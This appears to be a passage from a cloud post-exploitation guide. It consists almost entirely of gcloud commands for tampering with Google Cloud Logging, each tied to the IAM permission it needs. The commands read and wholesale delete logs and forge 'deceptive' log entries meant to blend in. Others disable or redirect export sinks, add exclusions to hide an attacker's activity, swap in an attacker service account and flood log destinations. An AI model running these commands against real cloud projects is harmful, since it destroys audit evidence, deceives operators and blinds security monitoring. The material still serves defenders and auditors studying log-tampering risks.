```bash
# Read logs
gcloud logging read "logName=projects/your-project-id/logs/log-id" --limit=10 --format=json
# Everything from a timestamp
gcloud logging read "timestamp >= \"2023-01-01T00:00:00Z\"" --limit=10 --format=json
# Use these options to indicate a different bucket or view to use: --bucket=_Required --view=_Default
```
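If you don't know which logs exist, you can enumerate the log names first and then narrow the read with a filter. A minimal sketch (the project ID and the severity filter are placeholders, not taken from the commands above):

```bash
# List the log names available in the project
gcloud logging logs list --project=your-project-id
# Read only high-severity entries using the Logging query language
gcloud logging read "severity>=ERROR" --limit=10 --format=json --project=your-project-id
```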
logging.logs.delete
```bash
# Delete all entries from a log in the _Default log bucket - logging.logs.delete
gcloud logging logs delete <log-name>
```
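It can be worth checking what a log contains before wiping it; a possible sketch, where `<log-name>` is the same log ID as above and `--quiet` skips gcloud's confirmation prompt:

```bash
# Peek at the entries that are about to be destroyed
gcloud logging read "logName=projects/your-project-id/logs/<log-name>" --limit=5
# Delete without being asked for confirmation
gcloud logging logs delete <log-name> --quiet
```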
Write logs - logging.logEntries.create
```bash
# Write a log entry to try to disrupt some system
gcloud logging write LOG_NAME "A deceptive log entry" --severity=ERROR
```
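Besides plain text, an entry can carry a structured JSON payload, which may blend in better with application logs; a sketch with a made-up log name and fields:

```bash
# Write a structured (JSON) payload instead of a text message
gcloud logging write LOG_NAME '{"event": "user_login", "status": "success"}' --payload-type=json --severity=INFO
```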
```bash
# Disable sink - logging.sinks.update
gcloud logging sinks update <sink-name> --disabled
# Create a filter to exclude the attacker's logs - logging.sinks.update
gcloud logging sinks update SINK_NAME --add-exclusion="name=exclude-info-logs,filter=severity<INFO"
# Change where the sink is storing the data - logging.sinks.update
gcloud logging sinks update <sink-name> <new-destination>
# Change the service account to one without permissions to write to the destination - logging.sinks.update
gcloud logging sinks update SINK_NAME --custom-writer-identity=attacker-service-account-email --project=PROJECT_ID
# Remove exclusions to try to overload the destination with logs - logging.sinks.update
gcloud logging sinks update SINK_NAME --clear-exclusions
# If the sink exports to BigQuery, an attacker might enable or disable the use of partitioned tables, potentially leading to inefficient querying and higher costs - logging.sinks.update
gcloud logging sinks update SINK_NAME --use-partitioned-tables
gcloud logging sinks update SINK_NAME --no-use-partitioned-tables
```
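To pick a sink to tamper with, you can first enumerate the existing sinks and inspect their destination, filter and writer identity; a minimal sketch (PROJECT_ID and SINK_NAME are placeholders):

```bash
# List the sinks in the project
gcloud logging sinks list --project=PROJECT_ID
# Show a sink's destination, filter, exclusions and writer identity
gcloud logging sinks describe SINK_NAME --project=PROJECT_ID
```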